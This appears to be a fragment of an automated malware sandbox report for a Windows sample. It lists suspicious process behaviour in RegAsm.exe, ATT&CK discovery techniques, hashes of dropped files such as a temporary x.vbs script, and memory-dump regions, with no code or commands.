- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1048

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:720

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

3

T1082

Query Registry

2

T1012

Remote System Discovery

1

T1018

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27
MD5
690c853f37a280ec104526b676af97ea

SHA1
9e72259681bbc0422f073c077347ed972a7c88a1

SHA256
d972cc505e7b0f85b202d4543364d74e6fe0802111b3705ef748e141d64bb32b

SHA512
373bb78fb0c20a6bd412628da505bd1810c057f50b31bd8f386c82a92bc756925d5c94393ae65f357aba095238d62e9654cdebabb34a8b282b9e24211d3d6c9e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27
MD5
449004e712affa559dc963bd4222ad01

SHA1
890a0a1711d3c6e224e721e81cd737d483e12be5

SHA256
21639dd813184f81dcb72af5ef832c285fcf716e82233cceb314b54b56abf818

SHA512
6cb2d000321e92488afc2ba0224d6158e2bd40954daf69f3ba064dc89c90d2928f7d678b3db40622a434ddc878afc29b1320153fa624c4fed4a05d74495dc964

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
MD5
c6b0a774fa56e0169ed7bb7b25c114dd

SHA1
bcdba7d4ecfff2180510850e585b44691ea81ba5

SHA256
b87210c4a0814394371ec7fba00fc02d9adbb22bcb1811a2abab46fdf4325da9

SHA512
42295d57f735c31749235c8463ac2c31778bff46a6a16c87918440d0b2fc70d2f1f6fb10d2499105866f7022108bbda4268d2580356245bd19bbed1ee3a2c446

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
d917f01805e3289791a4e186603248fc

SHA1
42f66df217676b9803e5849ff05051b3b8ce640f

SHA256
fdc8c21a59c5a4dcd1eeb35ebd948f635b24a52885ed693a1b92d16ed614f6ba

SHA512
f79cee1a759c3f4350dd530695b9fd71bdff2dbd24711bb4a44878df3d96a34d26e5efa1fb15b0d39d6d61f96a001dc10ce40deefd7cb0bcfa8c1f9c7d397da0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
f861b7db75c5a6fc9247cead7e7ce9de

SHA1
1c840039c0f204f16f3c363323d8b8f4ae44056f

SHA256
a5e26be862c11d1653597e135cbde29f778cd508ab02e28a126ec6aa34205912

SHA512
455f732aae1d282969e9cfa7a47f08ff22cf09fce82b1181d719de69105f94a6eead3afd0e5ee2511e43793c786d199ebf3700f1d9b7261158fe91b78d41641f

Download Submit
C:\Users\Admin\AppData\Local\Temp\x.vbs
MD5
4916ad516a9d0b5c95d80f2a16a3d114

SHA1
6fe3287ffb508a11805070c8600717a8dd567b15

SHA256
82c9d74c9a8688ed1fffd53e3b8ffaf9ae8f85a843f34412d15f88b18ce134a9

SHA512
197c5cdfc3f8511808e9126cecf657c35bf601cced8df15317733b3e5147ee282981f04113e3b6abcd1e4e0b2b8d440812beb5763b0a775d9e87a41dbd37d2fa

Download Submit
memory/720-348-0x0000000000400000-0x000000000040C000-memory.dmp

Filesize
48KB

Download
memory/720-350-0x00000000053B0000-0x000000000544C000-memory.dmp

Filesize
624KB

Download
memory/720-360-0x0000000005560000-0x000000000556A000-memory.dmp

Filesize
40KB

Download
memory/720-358-0x00000000055F0000-0x0000000005682000-memory.dmp

Filesize
584KB

Download
memory/720-338-0x000000000040676E-mapping.dmp

Download
memory/720-359-0x0000000005310000-0x00000000053AC000-memory.dmp

Filesize
624KB

Download
memory/720-351-0x0000000005950000-0x0000000005E4E000-memory.dmp

Filesize
5.0MB

Download
memory/720-349-0x0000000000400000-0x000000000040C000-memory.dmp

Filesize
48KB

Download
memory/1048-332-0x000002BFF40E0000-0x000002BFF40E8000-memory.dmp

Filesize
32KB

Download
memory/1048-333-0x000002BFF4290000-0x000002BFF4292000-memory.dmp

Filesize
8KB

Download
memory/1048-326-0x000002BFF40A0000-0x000002BFF40C2000-memory.dmp

Filesize
136KB

Download
memory/1048-336-0x000002BFF4250000-0x000002BFF425C000-memory.dmp

Filesize
48KB

Download
memory/1048-329-0x000002BFF4720000-0x000002BFF4796000-memory.dmp

Filesize
472KB

Download
memory/1048-321-0x0000000000000000-mapping.dmp

Download
memory/1048-335-0x000002BFF4296000-0x000002BFF4298000-memory.dmp

Filesize
8KB

Download
memory/1048-334-0x000002BFF4293000-0x000002BFF4295000-memory.dmp

Filesize
8KB

Download
memory/2200-279-0x0000000000000000-mapping.dmp

Download
memory/2648-352-0x0000026B997E6000-0x0000026B997E8000-memory.dmp

Filesize
8KB

Download
memory/2648-305-0x0000000000000000-mapping.dmp

Download
memory/2648-311-0x0000026BB19E0000-0x0000026BB1A02000-memory.dmp

Filesize
136KB

Download
memory/2648-317-0x0000026BB1D90000-0x0000026BB1E06000-memory.dmp

Filesize
472KB

Download
memory/2648-318-0x0000026B997E3000-0x0000026B997E5000-memory.dmp

Filesize
8KB

Download
memory/2648-316-0x0000026B997E0000-0x0000026B997E2000-memory.dmp

Filesize
8KB

Download
memory/2724-264-0x0000000000000000-mapping.dmp

Download
memory/2980-283-0x0000000000000000-mapping.dmp

Download
memory/3432-128-0x00007FF9863F0000-0x00007FF986400000-memory.dmp

Filesize
64KB

Download
memory/3432-116-0x00007FF989EC0000-0x00007FF989ED0000-memory.dmp

Filesize
64KB

Download
memory/3432-121-0x0000019202360000-0x0000019202362000-memory.dmp

Filesize
8KB

Download
memory/3432-122-0x0000019202360000-0x0000019202362000-memory.dmp

Filesize
8KB

Download
memory/3432-118-0x00007FF989EC0000-0x00007FF989ED0000-memory.dmp

Filesize
64KB

Download
memory/3432-119-0x00007FF989EC0000-0x00007FF989ED0000-memory.dmp

Filesize
64KB

Download
memory/3432-120-0x0000019202360000-0x0000019202362000-memory.dmp

Filesize
8KB

Download
memory/3432-117-0x00007FF989EC0000-0x00007FF989ED0000-memory.dmp

Filesize
64KB

Download
memory/3432-129-0x00007FF9863F0000-0x00007FF986400000-memory.dmp

Filesize
64KB

Download
memory/3432-256-0x000001920E8B0000-0x000001920E8B4000-memory.dmp

Filesize
16KB

Download
memory/3432-115-0x00007FF989EC0000-0x00007FF989ED0000-memory.dmp

Filesize
64KB

Download
memory/3872-315-0x00000209DC016000-0x00000209DC018000-memory.dmp

Filesize
8KB

Download
memory/3872-289-0x0000000000000000-mapping.dmp

Download
memory/3872-297-0x00000209DC010000-0x00000209DC012000-memory.dmp

Filesize
8KB

Download
memory/3872-294-0x00000209DBF90000-0x00000209DBFB2000-memory.dmp

Filesize
136KB

Download
memory/3872-298-0x00000209DC013000-0x00000209DC015000-memory.dmp

Filesize
8KB

Download
memory/3872-299-0x00000209F42E0000-0x00000209F4356000-memory.dmp

Filesize
472KB

Download
memory/4064-288-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads